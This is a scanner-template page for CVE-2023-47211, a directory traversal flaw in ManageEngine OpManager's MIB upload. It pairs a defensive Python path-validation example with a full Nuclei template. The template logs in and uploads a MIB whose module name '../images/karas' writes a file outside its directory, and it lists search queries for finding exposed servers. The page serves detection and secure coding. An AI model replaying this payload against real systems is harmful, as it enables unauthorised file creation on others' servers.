ManageEngine OpManager - Directory Traversal
ID: CVE-2023-47211
Severity: high
Author: gy741
Tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi,intrusive,zohocorp
Description
A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation: the module name declared in the uploaded MIB is used to build the path the file is written to, so a module name containing traversal sequences places the file outside the intended MIB directory. An attacker can send a malicious MIB file to trigger this vulnerability.
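The weakness described above is the classic CWE-22 pattern: an attacker-controlled name (here the MIB module identifier, which the template sets to ../images/karas) becomes part of a filesystem path. The following is an added example, written for this page and not taken from OpManager or from the Nuclei template, of how an upload handler can derive a storage path safely. It assumes a hypothetical storage directory (mibs) and hypothetical function names; the MIB bodies are constructed from the module header shown in the template.

```python
"""
Added example (not OpManager code): derive a storage file name from a MIB
module identifier without permitting path traversal (CWE-22).
"""
import re
from pathlib import Path

# A MIB module opens with: <ModuleIdentifier> DEFINITIONS ::= BEGIN
_MODULE_HEADER = re.compile(r"^\s*(\S+)\s+DEFINITIONS\s*::=\s*BEGIN", re.MULTILINE)

# SMIv2 / ASN.1 module identifiers: an upper-case letter followed by letters,
# digits and single hyphens (RFC 2578 section 3.1). Path separators and
# dot-dot sequences can never satisfy this allow-list.
_VALID_MODULE_NAME = re.compile(r"^[A-Z][A-Za-z0-9]*(-[A-Za-z0-9]+)*$")


def module_name(mib_text: str) -> str:
    """Return the module identifier declared in the MIB header, or raise."""
    m = _MODULE_HEADER.search(mib_text)
    if not m:
        raise ValueError("no DEFINITIONS ::= BEGIN header found")
    return m.group(1)


def safe_mib_path(mib_dir: str, name: str) -> Path:
    """Map a module name to a file inside mib_dir, rejecting traversal.

    Two independent checks are applied: an allow-list on the name itself and
    a containment check on the resolved path, so a future loosening of the
    allow-list still cannot write outside mib_dir.
    """
    if not _VALID_MODULE_NAME.match(name):
        raise ValueError(f"invalid MIB module name: {name!r}")
    base = Path(mib_dir).resolve()
    target = (base / f"{name}.mib").resolve()
    if base not in target.parents:
        raise ValueError(f"module name escapes MIB directory: {name!r}")
    return target


def store_decision(mib_dir: str, mib_text: str) -> str:
    """Return 'accept:<path>' or 'reject:<reason>' for an uploaded MIB body."""
    try:
        name = module_name(mib_text)
        return f"accept:{safe_mib_path(mib_dir, name)}"
    except ValueError as e:
        return f"reject:{e}"


# Constructed sample inputs: the traversal module header used by the template,
# and a well-formed module name.
TRAVERSAL_MIB = (
    "../images/karas DEFINITIONS ::= BEGIN\n"
    "IMPORTS enterprises FROM RFC1155-SMI;\n"
    "END\n"
)
BENIGN_MIB = (
    "KARAS-TEST-MIB DEFINITIONS ::= BEGIN\n"
    "IMPORTS enterprises FROM RFC1155-SMI;\n"
    "END\n"
)

if __name__ == "__main__":
    # "mibs" is a hypothetical storage directory, resolved relative to the cwd.
    for body in (TRAVERSAL_MIB, BENIGN_MIB):
        print(store_decision("mibs", body))
```

The allow-list is the primary control: it decides on the name's grammar rather than trying to strip dangerous substrings, which is the approach that traversal filters usually get wrong. The containment check on the resolved path is the backstop that would still catch a name such as a symlinked component if the grammar were ever relaxed.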
YAML Source
id: CVE-2023-47211

info:
  name: ManageEngine OpManager - Directory Traversal
  author: gy741
  severity: high
  description: |
    A directory traversal vulnerability exists in the uploadMib functionality of ManageEngine OpManager 12.7.258. A specially crafted HTTP request can lead to arbitrary file creation. An attacker can send a malicious MiB file to trigger this vulnerability.
  reference:
    - https://talosintelligence.com/vulnerability_reports/TALOS-2023-1851
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47211
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N
    cvss-score: 8.6
    cve-id: CVE-2023-47211
    cwe-id: CWE-22
    epss-score: 0.00164
    epss-percentile: 0.52964
    cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: zohocorp
    product: manageengine_firewall_analyzer
    shodan-query:
      - "http.title:\"OpManager Plus\""
      - http.title:"opmanager plus"
    fofa-query: title="opmanager plus"
    google-query: intitle:"opmanager plus"
  tags: cve,cve2023,zoho,manageengine,authenticated,traversal,lfi,intrusive,zohocorp

http:
  - raw:
      - |
        POST /two_factor_auth HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        j_username={{username}}&j_password={{password}}

      - |
        POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
        Host: {{Hostname}}
        X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
        Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262

        -----------------------------372334936941313273904263503262
        Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
        Content-Type: text/plain

        ../images/karas DEFINITIONS ::= BEGIN

        IMPORTS enterprises FROM RFC1155-SMI;

        microsoft OBJECT IDENTIFIER ::= { enterprises 311 }
        software OBJECT IDENTIFIER ::= { microsoft 1 }
        systems OBJECT IDENTIFIER ::= { software 1 }
        os OBJECT IDENTIFIER ::= { systems 3 }
        windowsNT OBJECT IDENTIFIER ::= { os 1 }
        windows OBJECT IDENTIFIER ::= { os 2 }
        workstation OBJECT IDENTIFIER ::= { windowsNT 1 }
        server OBJECT IDENTIFIER ::= { windowsNT 2 }
        dc OBJECT IDENTIFIER ::= { windowsNT 3 }

        END
        -----------------------------372334936941313273904263503262--

      - |
        POST /client/api/json/mibbrowser/uploadMib HTTP/1.1
        Host: {{Hostname}}
        X-ZCSRF-TOKEN: opmcsrftoken={{x_zcsrf_token}}
        Content-Type: multipart/form-data; boundary=---------------------------372334936941313273904263503262

        -----------------------------372334936941313273904263503262
        Content-Disposition: form-data; name="mibFile"; filename="karas.txt"
        Content-Type: text/plain

        ../images/karas DEFINITIONS ::= BEGIN

        IMPORTS enterprises FROM RFC1155-SMI;

        microsoft OBJECT IDENTIFIER ::= { enterprises 311 }
        software OBJECT IDENTIFIER ::= { microsoft 1 }
        systems OBJECT IDENTIFIER ::= { software 1 }
        os OBJECT IDENTIFIER ::= { systems 3 }
        windowsNT OBJECT IDENTIFIER ::= { os 1 }
        windows OBJECT IDENTIFIER ::= { os 2 }
        workstation OBJECT IDENTIFIER ::= { windowsNT 1 }
        server OBJECT IDENTIFIER ::= { windowsNT 2 }
        dc OBJECT IDENTIFIER ::= { windowsNT 3 }

        END
        -----------------------------372334936941313273904263503262--

    host-redirects: true
    max-redirects: 3
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "MIBFile with same name already exists")'
        condition: and

    extractors:
      - type: regex
        name: x_zcsrf_token
        group: 1
        part: header
        regex:
          - 'Set-Cookie: opmcsrfcookie=([^;]{50,})'
        internal: true
# digest: 4a0a00473045022100ab81db8984f11467f9b71995467e0b44005b75831e6a420f1b37ea54525c72400220360b01216bc1d302948dc66283d0aa1bf45d648a1ad4c2fd09d407c281890310:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is run with the Nuclei scanner to detect the vulnerability described above: it sends the requests listed in the YAML source and checks the responses against the matchers. It is tagged authenticated because the first request logs in with the {{username}} and {{password}} variables, and intrusive because a successful check creates a file on the target; the second upload is what produces the "MIBFile with same name already exists" response the matcher looks for.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-47211.yaml"